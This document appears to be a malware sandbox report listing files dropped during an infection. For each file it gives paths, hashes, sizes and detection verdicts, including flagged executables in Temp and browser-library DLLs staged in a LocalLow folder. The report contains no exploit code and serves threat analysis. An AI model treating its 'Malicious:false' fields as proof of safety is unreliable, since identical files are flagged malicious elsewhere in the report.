SHA-512:5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):26064
Entropy (8bit):5.981632010321345
Encrypted:false
SSDEEP:384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):70608
Entropy (8bit):5.389701090881864
Encrypted:false
SSDEEP:768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:5243F66EF4595D9D8902069EED8777E2
SHA1:1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 3%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19920
Entropy (8bit):6.2121285323374185
Encrypted:false
SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:7CD244C3FC13C90487127B8D82F0B264
SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):19920
Entropy (8bit):6.2121285323374185
Encrypted:false
SSDEEP:384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:7CD244C3FC13C90487127B8D82F0B264
SHA1:09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):117712
Entropy (8bit):6.598338256653691
Encrypted:false
SSDEEP:3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:Zip archive data, at least v2.0 to extract
Category:dropped
Size (bytes):2828315
Entropy (8bit):7.998625956067725
Encrypted:true
SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:1117CD347D09C43C1F2079439056ADA3
SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:false
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):334288
Entropy (8bit):6.808908775107082
Encrypted:false
SSDEEP:6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 132048
Entropy (8bit): 6.627391684128337
Encrypted: false
SSDEEP: 3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5: 5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1: 40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256: 2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512: A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 2%
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 20432
Entropy (8bit): 6.337521751154348
Encrypted: false
SSDEEP: 384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5: 4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1: 85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256: 3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512: 5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 55760
Entropy (8bit): 6.738700405402967
Encrypted: false
SSDEEP: 1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5: 56E982D4C380C9CD24852564A8C02C3E
SHA1: F9031327208176059CD03F53C8C5934C1050897F
SHA-256: 7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512: 92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious: false
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 22480
Entropy (8bit): 6.528357540966124
Encrypted: false
SSDEEP: 384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5: 96B879B611B2BBEE85DF18884039C2B8
SHA1: 00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256: 7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512: DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious: false
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 92624
Entropy (8bit): 6.639527605275762
Encrypted: false
SSDEEP: 1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5: 94919DEA9C745FBB01653F3FDAE59C23
SHA1: 99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256: BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512: 1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious: false
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 24016
Entropy (8bit): 6.532540890393685
Encrypted: false
SSDEEP: 384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5: 6099C438F37E949C4C541E61E88098B7
SHA1: 0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256: 46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512: 97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious: false
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 16336
Entropy (8bit): 6.437762295038996
Encrypted: false
SSDEEP: 192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5: F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1: 1191F64692A89A04D060279C25E4779C05D8C375
SHA-256: 7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512: 6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious: false
Reputation: unknown

C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll
Process: C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 144848
Entropy (8bit): 6.54005414297208
Encrypted: false
SSDEEP: 3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5: 4E8DF049F3459FA94AB6AD387F3561AC
SHA1: 06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256: 25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512: 3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious: false
Reputation: unknown
Preview:
C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142072
Entropy (8bit):6.809041027525523
Encrypted:false
SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:D6326267AE77655F312D2287903DB4D3
SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:false
Reputation:unknown
Preview:
C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):83784
Entropy (8bit):6.890347360270656
Encrypted:false
SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:7587BF9CB4147022CD5681B015183046
SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:false
Reputation:unknown
Preview:
C:\Users\user\AppData\LocalLow\sqlite3.dll
Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):916735
Entropy (8bit):6.514932604208782
Encrypted:false
SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:F964811B68F9F1487C2B41E1AEF576CE
SHA1:B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:false
Reputation:unknown
Preview:
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3F71.exe.log
Process:C:\Users\user\AppData\Local\Temp\3F71.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):700
Entropy (8bit):5.346524082657112
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:65CF801545098D915A06D8318D296A01
SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:false
Reputation:unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
C:\Users\user\AppData\Local\Temp\1D34.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):905216
Entropy (8bit):7.399713113456654
Encrypted:false
SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:852D86F5BC34BF4AF7FA89C60569DF13
SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:
C:\Users\user\AppData\Local\Temp\1E7F.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):301056
Entropy (8bit):5.192330972647351
Encrypted:false
SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
MD5:277680BD3182EB0940BC356FF4712BEF
SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:
C:\Users\user\AppData\Local\Temp\239.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3576320
Entropy (8bit):7.9976863291960605
Encrypted:true
SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
MD5:5800952B83AECEFC3AA06CCB5B29A4C2
SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:
C:\Users\user\AppData\Local\Temp\2D04.exe
Process:C:\Windows\explorer.exe
File Type:MS-DOS executable
Category:dropped
Size (bytes):557664
Entropy (8bit):7.687250283474463
Encrypted:false
SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
MD5:6ADB5470086099B9169109333FADAB86
SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
C:\Users\user\AppData\Local\Temp\2DB3.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 322560
Entropy (8bit): 6.7095586688781985
Encrypted: false
SSDEEP: 6144:nOOJ91Tu9Vc1ye3MKfa+zqKnvDfsxa6hkZC15O5Pdz:nRJ91TYWym1ffzvD36YC15E
MD5: 6009BCB680BE6C0F656AA157E56423DC
SHA1: FA9BA68D6B2026683BD392259BA26D7D468AEA7E
SHA-256: 5C037C7C1338CF54A9D1E81B74BB4AD003E1A254069A03499426EC1600A748D9
SHA-512: 5ECE7D9531051C951DFA0CF9533AB778B468EBE3EBE5D7B8A934D408E69BE910F244C59810A5FB41376B1CA7E5EB78DBF514032354EF047D00F043E2A17795E9
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
C:\Users\user\AppData\Local\Temp\309C.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 320512
Entropy (8bit): 6.693203776268283
Encrypted: false
SSDEEP: 6144:ea1ijIN+Aee6+saxCBxHoM3sDKOd4xncb3wQ:eag8N+Ae2sTvIM5OYncb
MD5: 8B25D9317E18654C3F83EF8630D1DE16
SHA1: B4503FB92DCB9B4B90E2CD2A534AE38C08F0589A
SHA-256: 1BE428F924402D7CC4586CA37A9E843C869B394F85085DB5E4E85D150AA87E04
SHA-512: 36AD3AD9E9DF0D52DEB4F350880BAEFA3F6871945D566118573AD1511F9CCDE55A5EC205AADCB7ACA156AAFC881587551996BBE27A47B27F8BD596CBCE04E97B
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
C:\Users\user\AppData\Local\Temp\3F71.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: modified
Size (bytes): 537088
Entropy (8bit): 5.840438491186833
Encrypted: false
SSDEEP: 12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
MD5: D7DF01D8158BFADDC8BA48390E52F355
SHA1: 7B885368AA9459CE6E88D70F48C2225352FAB6EF
SHA-256: 4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
SHA-512: 63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation: unknown
C:\Users\user\AppData\Local\Temp\A7F0.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 905216
Entropy (8bit): 7.399713113456654
Encrypted: false
SSDEEP: 12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5: 852D86F5BC34BF4AF7FA89C60569DF13
SHA1: C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256: 2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512: B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious: true
Reputation: unknown
C:\Users\user\AppData\Local\Temp\BC16.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 373760
Entropy (8bit): 6.990411328206368
Encrypted: false
SSDEEP: 6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
MD5: 8B239554FE346656C8EEF9484CE8092F
SHA1: D6A96BE7A61328D7C25D7585807213DD24E0694C
SHA-256: F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
SHA-512: CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
Malicious: false
Reputation: unknown
C:\Users\user\AppData\Local\Temp\D452.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 3576320
Entropy (8bit): 7.9976863291960605
Encrypted: true
SSDEEP: 49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
MD5: 5800952B83AECEFC3AA06CCB5B29A4C2
SHA1: DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
SHA-256: B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
SHA-512: 2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
Malicious: false
Reputation: unknown
C:\Users\user\AppData\Local\Temp\tejjnepq.exe
Process: C:\Users\user\AppData\Local\Temp\309C.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 15600640
Entropy (8bit): 3.7768495924879493
Encrypted: false
SSDEEP: 6144:xa1ijIN+Aee6+saxCBxHoM3sDKOd4xncb3wQ:xag8N+Ae2sTvIM5OYncb
MD5: 310337FA2432C256984AA89486B74D95
SHA1: A5234B3EA059F3A553C55D262BC2B7CB347ED12E
SHA-256: 966557B6F228EDA641E155A858F574654E431743311D83E4841013D63044A994
SHA-512: 8E9F3F6404445BAE167845B77D173AA8FF982DFD7EB998FD33FFD57AC92FB111B4FEAB934A7A961349A00D7D0B925CD3451C814779E33E8FE9454BFED92C6710
Malicious: true
Reputation: unknown
C:\Users\user\AppData\Roaming\gdrgbdj
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 319488
Entropy (8bit): 6.6822544763975475
Encrypted: false
SSDEEP: 6144:dTIJAM3EC/eddUaHyF9mqcMuS9W1uPVeHcENjQe:dY3EIWU9/pcO9rPVeqe
MD5: 9AF4D2022DC05C2DBBC4D218A8F0974C
SHA1: F87C7511D2C4EA4894603D3CFDDD478C8C2B3EAD
SHA-256: C8FE81088B2CAA9DF35D92A588FB266A145C95B81B5C66D5BFE181FA73B17D82
SHA-512: 71230365C1E7ACB2B8740434322A1F8AA87D417EADBB6D8D7FB1B2BF9ECB1247BFEC2B2568812F22D61F125B3F4F739989121B5E17C63CCD580D8E8B059C63C0
Malicious: true
Reputation: unknown

C:\Users\user\AppData\Roaming\gdrgbdj:Zone.Identifier
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
